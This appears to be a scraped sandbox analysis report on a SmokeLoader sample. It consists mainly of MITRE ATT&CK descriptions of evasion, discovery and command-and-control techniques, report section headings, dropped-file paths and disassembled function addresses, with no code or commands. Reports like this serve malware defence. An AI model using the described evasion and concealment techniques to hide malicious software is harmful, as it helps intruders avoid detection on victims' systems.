Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report HaPJ2rPP6w.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

C:\Users\user\AppData\Local\Temp\89ED.exe

C:\Users\user\AppData\Local\Temp\C12E.exe

C:\Users\user\AppData\Roaming\bbdeaec

C:\Users\user\AppData\Roaming\wideaec

C:\Users\user\AppData\Roaming\wideaec:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Windows Analysis Report
HaPJ2rPP6w.exe

Function 004167C0 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 299
windowtimefileCOMMON

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Function 00851503 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre